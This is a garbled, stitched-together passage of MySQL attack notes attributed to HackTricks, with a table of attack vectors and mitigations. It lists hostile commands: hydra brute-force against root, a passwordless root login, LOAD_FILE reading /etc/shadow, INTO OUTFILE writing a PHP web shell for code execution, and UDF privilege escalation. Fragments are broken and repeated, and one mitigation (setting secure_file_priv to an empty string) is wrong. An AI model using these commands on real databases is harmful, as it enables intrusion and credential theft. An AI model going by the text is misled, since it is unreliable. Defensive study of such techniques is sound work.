SELECT @@plugin_dir;
: For network-level testing, researchers verify remote access to port 3306 using tools like nmap or mysql client commands ( mysql -h -u root ) before attempting brute-force attacks. Common Exploitation Paths (Verified on HackTricks) mysql hacktricks verified
SELECT '' INTO OUTFILE '/var/www/html/shell.php'; to achieve Remote Code Execution (RCE). B. Privilege Escalation via UDF Privilege Escalation via UDF | Attack Vector |
| Attack Vector | Verified HackTricks Technique | Defensive Mitigation | |---------------|-------------------------------|----------------------| | Credential brute‑force | hydra -l root -P wordlist.txt mysql://target | Enforce account lockout, use strong passwords, restrict network access to 3306 | | UDF privilege escalation | Uploading udf.so to plugin directory | Set secure_file_priv = "" or a specific safe directory; run MySQL as non‑root user | | File read via LOAD_FILE | SELECT LOAD_FILE('/etc/shadow') | Disable FILE privilege unless absolutely necessary; use SELinux/apparmor | | Writing web shell | INTO OUTFILE to webroot | Set secure_file_priv to a directory not accessible by the web server; use prepared statements against SQLi | use strong passwords
: Controls the IP address that listens for administrative TCP/IP connections.
mysql -u root -h target.com --skip-password
: Attempt to connect locally or remotely, often using brute force if credentials are unknown.